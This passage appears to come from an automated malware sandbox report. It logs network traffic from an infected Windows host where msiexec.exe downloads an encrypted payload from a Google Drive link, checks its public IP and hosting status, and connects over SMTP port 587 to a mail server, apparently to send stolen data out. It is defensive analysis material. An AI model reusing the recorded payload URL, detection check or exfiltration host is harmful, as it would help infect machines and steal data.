Nov 5, 2024 15:56:54.784419060 CET	443	49903	172.67.74.152	192.168.2.7
Nov 5, 2024 15:56:54.787611961 CET	49903	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:56:54.831331968 CET	443	49903	172.67.74.152	192.168.2.7
Nov 5, 2024 15:56:54.977835894 CET	443	49903	172.67.74.152	192.168.2.7
Nov 5, 2024 15:56:54.977926016 CET	443	49903	172.67.74.152	192.168.2.7
Nov 5, 2024 15:56:54.977984905 CET	49903	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:56:54.982201099 CET	49903	443	192.168.2.7	172.67.74.152
Nov 5, 2024 15:56:55.001746893 CET	49908	80	192.168.2.7	208.95.112.1
Nov 5, 2024 15:56:55.007544994 CET	80	49908	208.95.112.1	192.168.2.7
Nov 5, 2024 15:56:55.007608891 CET	49908	80	192.168.2.7	208.95.112.1
Nov 5, 2024 15:56:55.007704973 CET	49908	80	192.168.2.7	208.95.112.1
Nov 5, 2024 15:56:55.012672901 CET	80	49908	208.95.112.1	192.168.2.7
Nov 5, 2024 15:56:55.607187986 CET	80	49908	208.95.112.1	192.168.2.7
Nov 5, 2024 15:56:55.661102057 CET	49908	80	192.168.2.7	208.95.112.1
Nov 5, 2024 15:56:56.933933020 CET	49908	80	192.168.2.7	208.95.112.1
Nov 5, 2024 15:56:56.940958977 CET	80	49908	208.95.112.1	192.168.2.7
Nov 5, 2024 15:56:56.941143990 CET	49908	80	192.168.2.7	208.95.112.1
Nov 5, 2024 15:56:57.227129936 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:57.232079983 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:57.235435963 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:57.952785015 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:57.952949047 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:57.957783937 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.110362053 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.110641956 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:58.115732908 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.271071911 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.271275997 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:58.276133060 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.439517021 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.439752102 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:58.444922924 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.621293068 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.621470928 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:58.626601934 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.818651915 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.818753004 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:58.824249029 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.977708101 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.978377104 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:58.978426933 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:58.978442907 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:58.978456020 CET	49923	587	192.168.2.7	208.91.199.223
Nov 5, 2024 15:56:58.983412981 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.983655930 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.984133959 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:58.984143972 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:59.270684958 CET	587	49923	208.91.199.223	192.168.2.7
Nov 5, 2024 15:56:59.317343950 CET	49923	587	192.168.2.7	208.91.199.223

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 15:56:47.618263006 CET	62430	53	192.168.2.7	1.1.1.1
Nov 5, 2024 15:56:47.625665903 CET	53	62430	1.1.1.1	192.168.2.7
Nov 5, 2024 15:56:49.224668980 CET	60779	53	192.168.2.7	1.1.1.1
Nov 5, 2024 15:56:49.233324051 CET	53	60779	1.1.1.1	192.168.2.7
Nov 5, 2024 15:56:54.167345047 CET	49858	53	192.168.2.7	1.1.1.1
Nov 5, 2024 15:56:54.175067902 CET	53	49858	1.1.1.1	192.168.2.7
Nov 5, 2024 15:56:54.994312048 CET	54347	53	192.168.2.7	1.1.1.1
Nov 5, 2024 15:56:55.001285076 CET	53	54347	1.1.1.1	192.168.2.7
Nov 5, 2024 15:56:56.934799910 CET	52458	53	192.168.2.7	1.1.1.1
Nov 5, 2024 15:56:57.225425959 CET	53	52458	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 15:56:47.618263006 CET	192.168.2.7	1.1.1.1	0x1027	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:49.224668980 CET	192.168.2.7	1.1.1.1	0x4c5	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:54.167345047 CET	192.168.2.7	1.1.1.1	0x2dc3	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:54.994312048 CET	192.168.2.7	1.1.1.1	0x18a	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:56.934799910 CET	192.168.2.7	1.1.1.1	0x16c0	Standard query (0)	smtp.santonswitchgears.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 15:56:47.625665903 CET	1.1.1.1	192.168.2.7	0x1027	No error (0)	drive.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:49.233324051 CET	1.1.1.1	192.168.2.7	0x4c5	No error (0)	drive.usercontent.google.com		142.250.186.161	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:54.175067902 CET	1.1.1.1	192.168.2.7	0x2dc3	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:54.175067902 CET	1.1.1.1	192.168.2.7	0x2dc3	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:54.175067902 CET	1.1.1.1	192.168.2.7	0x2dc3	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:55.001285076 CET	1.1.1.1	192.168.2.7	0x18a	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:57.225425959 CET	1.1.1.1	192.168.2.7	0x16c0	No error (0)	smtp.santonswitchgears.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 15:56:57.225425959 CET	1.1.1.1	192.168.2.7	0x16c0	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:57.225425959 CET	1.1.1.1	192.168.2.7	0x16c0	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:57.225425959 CET	1.1.1.1	192.168.2.7	0x16c0	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Nov 5, 2024 15:56:57.225425959 CET	1.1.1.1	192.168.2.7	0x16c0	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

api.ipify.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49908	208.95.112.1	80	7596	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 15:56:55.007704973 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 5, 2024 15:56:55.607187986 CET	174	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 14:56:55 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49867	142.250.186.78	443	7596	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 14:56:48 UTC	216	OUT	GET /uc?export=download&id=1DCNS7VE8vVN-swgSahJP0MaXjRsS3cso HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2024-11-05 14:56:49 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 05 Nov 2024 14:56:49 GMT Location: https://drive.usercontent.google.com/download?id=1DCNS7VE8vVN-swgSahJP0MaXjRsS3cso&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-fsvI-AgnnMey7bjKm54uAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49876	142.250.186.161	443	7596	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 14:56:50 UTC	258	OUT	GET /download?id=1DCNS7VE8vVN-swgSahJP0MaXjRsS3cso&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-11-05 14:56:52 UTC	4920	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="HfUClkAmMji141.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 246336 Last-Modified: Wed, 09 Oct 2024 12:29:38 GMT X-GUploader-UploadID: AHmUCY1sydu7fMsUaC1vrOywUlaYeNx6Zuw01kuqGSP6OC4xLShCjkCvcxjSI_Ajks7jqgOtyg-_7Q1sRg Date: Tue, 05 Nov 2024 14:56:52 GMT Expires: Tue, 05 Nov 2024 14:56:52 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=S/NWpw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-05 14:56:52 UTC	4920	IN	Data Raw: d4 9d a7 3c 2e 39 f9 e8 cb 47 60 f9 42 c8 50 3a 7d f7 d3 30 d3 45 ae 42 52 ea 22 23 12 e5 3e be 15 7b ef c2 8f 0c e4 35 46 f5 32 99 1d a8 77 6d f8 38 5c b4 7e b6 57 59 11 e6 06 09 3e 74 ff 1f 74 86 08 d3 95 f7 e3 69 f4 13 c1 87 e1 0b 92 ca 36 c5 58 0b ec a1 35 f8 23 3d 1c 86 a8 e3 fe 1f 07 c7 8c 9a 52 70 f7 51 21 34 29 c7 c1 36 15 43 50 cd de 27 d2 6e 45 61 0d 96 3d 6c 48 44 09 e1 ed 6a c7 3e ac 35 36 c2 ee 21 a9 27 57 ec b5 36 70 f7 9f 20 b6 ae ae 8b 63 85 b5 47 dc 73 94 55 d4 64 2f 69 bb c5 61 c0 1a db db c7 bd a6 f9 0f 8d 27 03 9c 73 64 63 db cb ac bc 74 2d bd 07 c5 9b 74 85 5f 95 69 e9 8c af 12 1a d8 97 4a 19 69 77 d7 95 ea 2d b0 09 76 82 ec e8 4f 73 d3 6b 40 12 4e 52 8d 83 7d df af b6 6a d1 fb 0c d1 53 90 a7 07 53 71 9a c8 ab 54 ff 39 3b 6e e0 a5 64 Data Ascii: <.9G`BP:}0EBR"#>{5F2wm8\~WY>tti6X5#=RpQ!4)6CP'nEa=lHDj>56!'W6p cGsUd/ia'sdct-t_iJiw-vOsk@NR}jSSqT9;nd
2024-11-05 14:56:52 UTC	4858	IN	Data Raw: c4 c1 e9 f3 02 e8 95 da b3 1d fa 3a 5e 48 4d 0c bb b5 14 ae 3a 4c b4 de f7 e9 aa 2f c8 45 67 f9 5b 49 6d d1 ef ac 42 7a 2d bd 07 3b c7 31 85 7f d9 68 ea 8c 76 3f 13 b4 97 4a 19 69 57 d6 95 ea cd 4e 05 77 89 ed 1d 43 73 6b 48 4c 12 46 52 73 82 44 da af f8 bc ea fe 0c f1 53 a8 f5 19 af 8e b0 c8 eb 54 ec 29 3d 6e b3 a6 64 fa 41 36 bb 8a d0 a0 67 85 f1 1e dc fb 0d ad c5 ac c1 cf 5e 67 f2 56 dd 88 aa 17 94 28 f6 3c d1 27 d6 75 17 d5 a9 c6 68 4c 25 c8 22 d8 2d 07 a7 54 80 b6 39 a8 2f e4 d5 7f 85 2f af 78 63 49 84 61 71 a4 6a 50 d5 a8 b9 eb 27 d6 9f 35 35 16 e8 1b 6d 02 15 6d e6 78 fd ab 9c dd 6f 89 9d 18 c3 e7 c8 47 2f f2 f7 18 45 82 0c f1 f0 92 4d 63 f0 91 0e 88 10 87 31 bb f2 af ae 67 01 69 cd 71 14 0d 06 d3 14 bd 8b e8 92 67 ad 97 c4 4f 41 cc f2 8c 24 94 1d Data Ascii: :^HM:L/Eg[ImBz-;1hv?JiWNwCskHLFRsDST)=ndA6g^gV(<'uhL%"-T9//xcIaqjP'55mmxoG/EMc1giqgOA$
2024-11-05 14:56:52 UTC	1378	IN	Data Raw: 2c f5 00 f1 53 6e ab eb 50 51 83 c8 eb 54 01 18 02 60 e0 a7 64 c2 d9 33 bb 9b d0 ba 67 85 f1 1e dc f3 0d 95 04 a1 cd cf 7e 97 fe 52 dd 56 a8 2e 8f 28 08 3d 16 3a d2 75 3f 68 a5 c7 62 3e 69 c8 22 f9 d7 09 a7 54 5e b7 3d a8 2f e4 d7 77 85 0f 50 74 6f 49 5a 61 48 b6 6a ae d4 e2 8c eb 27 dc 9f 32 34 16 18 14 6d 02 17 bb a9 7c fd a1 4a 93 6b 89 b7 e4 cd e6 c8 99 2c cb 76 18 bb 8c fe fd f1 6c 32 74 f2 b1 1f 76 1e 85 cf 44 c7 a3 ae 15 00 51 d3 04 69 39 27 cb 10 43 87 14 9c 43 a4 97 3a 45 3f d9 d2 ac 54 bc 0b 22 67 1c 0e 71 a5 b3 3a d3 a7 b8 6c 44 ed 2f 54 bd a1 75 59 4a 36 a4 d3 30 82 5b 38 95 4a 36 5d 9e 8d d7 c1 6b 4b 1f 89 30 d4 9e 75 44 a5 3d b1 0b 82 d6 6e ec 56 df 49 23 f3 ff 7c 3f 2d ab fa 8a e5 c9 c0 61 41 0f 3b 8a da 05 b3 eb 5d c6 16 b7 4c 2e c0 79 54 Data Ascii: ,SnPQT`d3g~RV.(=:u?hb>i"T^=/wPtoIZaHj'24m\|Jk,vl2tvDQi9'CC:E?T"gq:lD/TuYJ60[8J6]kK0uD=nVI#\|?-aA;]L.yT
2024-11-05 14:56:52 UTC	1378	IN	Data Raw: 43 af 7c 00 4a 16 a4 d3 30 24 d8 72 95 4a c9 af 9c 8a f7 e5 77 4b 1f 77 cf e3 b0 75 44 5b cf b7 0b a2 fe 2b ec 56 2b 68 0a f9 ff 7c 55 75 a3 bd 8a e5 c3 c0 61 49 0f 1b 71 d6 09 b3 35 77 ca 16 b7 4c 23 f5 7c 74 1b 3d 36 d2 7f fc 61 47 8a 75 f3 ae 7f a1 a5 76 66 5d 66 97 5c 72 af cf 1b 3d b7 e7 e4 05 f5 a3 9a d4 18 9b 54 29 ab 0b c4 8d e3 94 74 76 a8 1f 23 0a 72 27 9d d3 b3 5f e0 af c4 fd 4a 52 15 3d 25 79 b0 5b be c3 ad 4a 77 bf f4 3c ec c1 8f d7 63 c2 50 dc df 17 46 aa 50 8c d7 30 fc 56 30 b1 8f fb d8 9d e1 14 b3 ae d0 99 99 64 fe e8 68 ba c1 c0 44 33 21 72 d6 84 59 ec 81 04 74 cd ba 84 47 1a 55 43 65 ea e3 c5 0b 62 3e fe 05 05 7d 13 30 3f 45 b2 52 6a d9 da ae 03 1b 97 5d 93 fd c6 4d 7c 1f cb 4a 3c 43 95 a7 bd a8 e1 f7 cb 07 43 fc cf ea 3b f3 cb a5 8c 6c Data Ascii: C\|J0$rJwKwuD[+V+h\|UuaIq5wL#\|t=6aGuvf]f\r=T)tv#r'_JR=%y[Jw<cPFP0V0dhD3!rYtGUCeb>}0?ERj]M\|J<CC;l
2024-11-05 14:56:52 UTC	1378	IN	Data Raw: 06 23 72 ba bc 16 13 76 fb 8a d0 9b 84 6d 1b 45 bd 6b eb e3 e2 3a 37 4a fe 03 fa 71 12 31 0c 75 b1 52 5e 25 db 97 05 1b 97 4c b3 dd c7 4d 7c e1 3b 40 3d 7b 6b 58 b1 a9 e1 29 c6 03 43 dc 39 eb 02 f6 35 a4 b5 46 5b ee fc 0a 7c 48 c0 12 e5 aa 2f c4 cb e1 ea 72 f0 93 30 f8 3d b4 b5 e7 3d 1e c5 80 17 0f c0 90 10 e4 87 49 fa f7 d1 b6 f4 c5 13 a1 14 e6 2e 86 e6 69 31 13 c4 6f 2d f3 37 7e 43 86 ec e5 d7 cd 93 0c 77 09 f6 3c 9f 27 c3 d8 57 a5 b3 da da a2 49 28 3e 2a 45 5b 83 f3 7e 74 b9 42 7c cb 62 3d e7 17 aa bb f5 12 c3 ef 91 5b f9 5a 9e b1 91 a8 1f d7 59 79 f1 eb 0e 0f 9f 2d e9 3c ae cb 27 57 cf 0d 49 8c 4e 71 7f f2 fa 85 62 e0 68 01 a1 27 e7 97 03 c4 c9 df 35 12 41 85 ac 1e 21 76 70 3e 9a fe 6e 65 47 ec b6 8c d8 6e f6 4b fd e0 0f 55 e7 6e 45 f6 24 86 55 31 a7 Data Ascii: #rvmEk:7Jq1uR^%LM\|;@={kX)C95F[\|H/r0==I.i1o-7~Cw<'WI(>*E[~tB\|b=[ZYy-<'WINqbh'5A!vp>neGnKUnE$U1
2024-11-05 14:56:52 UTC	1378	IN	Data Raw: 79 f1 eb 1f 17 18 2c e9 3c 70 cf 24 57 f7 f6 46 88 4e 71 7f f2 fd 85 62 e6 68 01 a1 27 e7 97 04 c4 c9 df 35 12 42 85 72 14 20 76 58 43 02 fa 64 61 f6 cc b0 8e 26 60 0a 45 d9 e4 0f ab eb 94 4b d5 2e 86 ab 3d 5a 54 c1 6b db c1 12 3a 6d fe 1e 8f 57 34 66 b9 cf 9c e0 1e 50 da a1 9f b9 ce 1e 4d 65 6f 9d ed ef 46 d9 3c 5c 15 3b cb 1a af 06 62 21 d1 58 bd 8f 83 a5 87 84 4b 9a e6 19 3f 86 e9 a5 75 ea 77 34 88 de 68 f1 6d 21 3c fa ea c8 b9 49 64 40 c6 62 49 39 0e 91 83 85 7f d2 20 25 7a 55 ac 89 d6 36 35 14 cd 19 b8 c0 2f 6d 68 60 d6 09 93 f0 98 08 4f 02 85 16 88 27 f9 c2 57 20 b9 c6 63 22 3e 94 c2 e5 ab 77 63 5c 34 b5 85 7f 96 a6 4f ed 06 9f 93 e8 7d e9 60 65 5e e8 0c 43 37 60 ea 06 c6 67 aa 22 2b d6 90 e7 ed cf 5c 0e 83 42 2b 9a f2 b3 35 2a 2c a1 5f a6 b8 9c 76 Data Ascii: y,<p$WFNqbh'5Br vXCda&`EK.=ZTk:mW4fPMeoF<\;b!XK?uw4hm!<Id@bI9 %zU65/mh`O'W c">wc\4O}`e^C7`g"+\B+5*,_v
2024-11-05 14:56:52 UTC	1378	IN	Data Raw: 16 88 dd ce ab 56 20 47 ea 6a 22 1e 95 3c eb a8 89 62 9b 2e b6 85 5f 6e af 4f ed 83 fd aa cd 79 17 6e 9b 57 cb 0e 93 21 60 14 0a ed 26 aa dc 2d fd d2 c7 ed c5 f9 18 7d 43 10 6e fc b3 35 0a 0b a0 5f a6 46 6c 7b de 30 f8 e0 44 78 3d c4 04 f6 9f fb d5 06 d4 c6 62 c2 55 44 4c c2 dd 04 b1 f4 b6 fb e8 d8 b5 df 98 95 0d 9e 43 7e fc d5 6d 0b 7a 80 14 3f 33 72 b2 7b 8f 67 58 63 aa 07 21 02 fe 42 1d 74 eb 37 07 46 d8 83 79 91 42 77 77 2e e9 e8 0c b6 ae bf 8d ad f8 f8 d6 fe 68 d3 88 6f dd 98 87 a2 69 35 16 c7 06 c6 21 1a 94 f0 40 e7 63 65 5d a1 0e 60 de ac b1 e3 f6 b3 35 08 d8 16 ab 4a 3a 6e 03 ae 04 16 d3 06 d3 02 4a 8a 29 29 95 3d 5b 86 8f 21 00 a7 dd 5c c8 21 3f 2b 93 8f ff 66 df ac f9 d4 8d d1 57 b9 30 a5 85 10 d9 0e be 4a 4c d7 ab e9 21 62 93 eb 25 1d 90 93 33 Data Ascii: V Gj"<b._nOynW!`&-}Cn5_Fl{0Dx=bUDLC~mz?3r{gXc!Bt7FyBww.hoi5!@ce]`5J:nJ))=[!\!?+fW0JL!b%3
2024-11-05 14:56:52 UTC	1378	IN	Data Raw: e2 cf 9d 31 08 d8 2e fb 4b 03 6b 23 a7 04 2e d6 f8 dd 01 72 d8 28 da 69 17 7b 83 8f 32 30 5b dc d8 df 21 3f 2a 6d 86 ee 46 a4 cf f9 d4 77 e6 d1 b9 08 0c a5 16 d9 0e 40 b8 42 d4 8b ea df 6e 90 15 04 20 87 93 33 4f 72 ba 30 c6 ea c7 0e 1a 07 40 18 04 c2 a7 52 f7 48 f3 46 22 79 bd af 00 ca c7 2e 39 fc 9a d3 96 f7 1d 68 c9 04 c1 87 1e 0a 9b ca 8e e5 58 0b ec a1 1d b5 63 3d 1a a6 ab e3 fe 1f f9 c9 8c 9a 52 8e fb 51 21 14 28 c7 c1 36 eb 42 69 da de 27 d2 90 4c 61 0d ed 4c 6c c8 40 66 db e3 75 7b 10 ae 81 3f 0f 31 97 a8 6b 9a 33 ed 5e 19 a4 bf 50 c4 c1 37 f8 3b e2 95 24 bd 1d da 3b a0 44 4d f2 95 b7 14 ae c4 be b5 e7 d9 ed aa 2f e0 b6 66 c0 58 69 6e d1 d7 a9 bc 74 2d 85 55 3a 34 ce af 5f d9 68 f1 bc 8a 3e ca be 97 4a 0b 69 77 c6 b5 ea cd b0 0b 89 87 ef e3 77 f2 Data Ascii: 1.Kk#.r(i{20[!?*mFw@Bn 3Or0@RHF"y.9hXc=RQ!(6Bi'LaLl@fu{?1k3^P7;$;DM/fXint-U:4_h>Jiww
2024-11-05 14:56:52 UTC	1378	IN	Data Raw: 07 0c ea 95 24 43 11 f8 3a 80 4c 4d 0c 9b 49 15 97 3f b2 b5 e7 c1 ec aa 2f e0 70 86 04 a2 96 44 d1 ef af 8c 70 2d 1a 15 c5 cb 30 85 5f c8 48 ea 8c 88 3e d4 b0 97 4a 21 fa 65 d7 95 ea 33 bc 0b 77 a9 e5 e3 4f 73 95 69 79 18 46 52 8d a9 5d d6 af f8 bc 2c f5 0c f1 53 6e ab e7 50 51 f6 c8 eb 54 01 18 02 41 e0 a7 64 04 4a 36 bb be 8b d4 67 85 f5 1e db ff 0d 6b f3 ac c1 e7 07 99 fe 54 b2 d6 a9 17 9e 00 14 3d e8 3c ab 01 17 2b a1 e7 05 b2 2b c8 dc f6 29 07 a7 aa 72 b8 3d 88 4f 1a d9 7b 7b 0e 97 6f 63 49 7a 9e 41 b7 6a 70 f5 db ac eb 67 12 71 3b 34 36 a9 19 6d 02 eb 9d e8 7c fd 55 6e d1 6b a9 d2 1a c3 e7 36 b8 17 e4 76 18 45 7c fb fd f1 b7 45 0c f2 91 0c 88 17 85 31 bb f7 ac ae 3d 59 69 cd 07 06 5a 07 d3 1a 6b 9b ea 92 45 d9 e3 c4 49 37 f9 82 8c 54 bc f5 d2 66 25 Data Ascii: $C:LMI?/pDp-0_H>J!e3wOsiyFR],SnPQTAdJ6gkT=<++)r=O{{ocIzAjpgq;46m\|Unk6vE\|E1=YiZkEI7Tf%
2024-11-05 14:56:52 UTC	1378	IN	Data Raw: 61 02 15 b3 a9 7c fd ab 9c d0 52 83 bd 1a c3 cd e8 fb 2e cb 76 e6 4b 82 f2 fd 0f 9e 3e 78 d2 8f 08 76 1e 7b 30 7c e9 ad ae 15 fe 60 cc 01 49 1c 07 d3 10 03 d3 ed 92 4f 84 88 c4 49 33 27 fc 8c 54 bc f5 d0 66 25 38 35 a5 b3 c4 21 ae 81 15 00 ed 2f 74 63 ea 7c 59 6a e9 aa d3 30 7c ab 38 95 4a e8 74 92 8d f7 3b 6a 72 3d 77 31 ed 42 7c 44 a5 e6 c0 7f 82 fe 2f 9e fc d3 69 43 db e3 7c 55 7f fe c8 8a e5 c7 1e 49 45 0f 1b 71 d4 05 b3 15 ad c6 16 b7 92 29 cc 79 74 e5 3c 37 dd 7f fc 61 55 aa 83 0c 51 81 53 ab 76 4c 5d 8b ab 5e 72 dd 8d 1b 3d b6 19 e5 2d c2 a3 9a d4 e6 6c 5b 29 8b 41 f5 8d e3 d4 6b 8f a4 1f 03 69 72 27 9d 2d 43 5e d9 a5 3a f1 4a 52 15 60 25 79 b0 5b b1 fa a7 4a 89 b3 de 1c 91 c0 8f d7 9d 32 51 e5 da e9 4a aa 68 a9 e3 30 fc 6e 04 4f 49 26 f0 ba e1 ea Data Ascii: a\|R.vK>xv{0\|`IOI3'Tf%85!/tc\|Yj0\|8Jt;jr=w1B\|D/iC\|UIEq)yt<7aUQSvL]^r=-l[)Akir'-C^:JR`%y[J2QJh0nOI&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49903	172.67.74.152	443	7596	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 14:56:54 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
